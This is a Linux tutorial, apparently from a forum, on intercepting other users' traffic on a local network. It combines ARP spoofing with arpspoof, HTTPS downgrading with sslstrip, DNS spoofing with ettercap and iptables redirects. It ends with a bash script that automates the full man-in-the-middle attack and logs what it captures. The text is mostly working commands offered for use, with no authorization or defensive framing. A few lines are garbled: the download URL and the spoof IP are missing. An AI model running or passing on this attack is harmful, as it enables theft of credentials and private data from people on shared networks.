
SSL sniffing on Ubuntu - SSL Strip/Arpspoof/Ettercap[Linux Tut]

Now I will show you how to sniff SSL traffic on the local network using Arpspoof, ettercap, and SSL strip.

The Install

This will install arpspoof (part of dsniff) and ettercap:

sudo apt-get install ettercap
sudo apt-get install dsniff

Installing sslstrip:

sudo wget Download
tar -zxvf sslstrip-0.7.tar.gz
sudo mv sslstrip-0.7 sslstrip
# setup.py lives inside the extracted directory
cd sslstrip
sudo python setup.py build
sudo rm sslstrip-0.7.tar.gz

Configuring Ettercap

sudo nano /etc/etter.conf

Change the [Privs] section to uid 0

ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

Uncomment the Linux IP tables lines

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Configuring DNS spoofing

sudo nano /usr/share/ettercap/etter.dns

The basic usable syntax is <original IP> A <spoof ip> and wildcards can be used

So to spoof all traffic to google.com you should put this new line at the end of the file:

* A

Sniffing and spoofing

Before any sniffing can be done you need to echo a 1 into /proc/sys/net/ipv4/ip_forward:

sudo su
echo 1 > /proc/sys/net/ipv4/ip_forward

Now you can sniff:

sudo arpspoof -i <network interface ie wlan0> <gateway/router ip>
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sudo sslstrip -a -k -f

I choose to log my ettercap sessions, but this is optional. If you choose to log, you must make sure the specified directory exists. Here is the command for a standard sniff:

sudo ettercap -T -q -i <network interface> -m "/home/path/to/log/" -P autoadd

Here is the command to dns spoof (remembering first to alter etter.dns to contain the site u wanna spoof to):

sudo ettercap -T -q -i <network interface> -m "/home/path/to/log/" -P dns_spoof

I find it a bit cumbersome using these tools in this way, so I wrote a script to do the hard work for me, which I thought I might as well share. Save it and mark it as executable.

echo -e "Please ensure \E[32m\033[1m'echo 1 > /proc/sys/net/ipv4/ip_forward'\E[37m\033[0m has been performed as root"
echo -e "If you plan to spoof change your IP in \E[32m\033[1m'/usr/share/ettercap/etter.dns'\E[37m\033[0m"
now=$(date +"%d-%b-%y")
netlog="$now Ettercap Log.txt"
echo -n "Please enter the router IP:    "
read routerip
echo -n "Please enter interface name (eg: wlan0):    "
read iface
echo -n "Would you like to dns spoof at this time? [y/n]"
read spoof
sudo xterm -geometry 75x15+1+300 -T "ARP Spoof" -e arpspoof -i $iface $routerip &
sleep 2
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 &
echo "Routed IP Tables"
sudo xterm -geometry 75x15+500+300 -T "SSL Strip" -e sslstrip -a -k -f &
echo "SSL Strip Launched successfully"
sleep 2
if [ "$spoof" = "n" ]; then
# Standard sniff
sudo xterm -geometry 75x15+1000+300 -T Ettercap -e ettercap -T -q -i $iface -m "/home/path/to/log/$netlog" -P autoadd &
else
# DNS spoof using the entries in etter.dns
sudo xterm -geometry 75x15+1000+300 -T Ettercap -e ettercap -T -q -i $iface -m "/home/path/to/log/$netlog" -P dns_spoof &
fi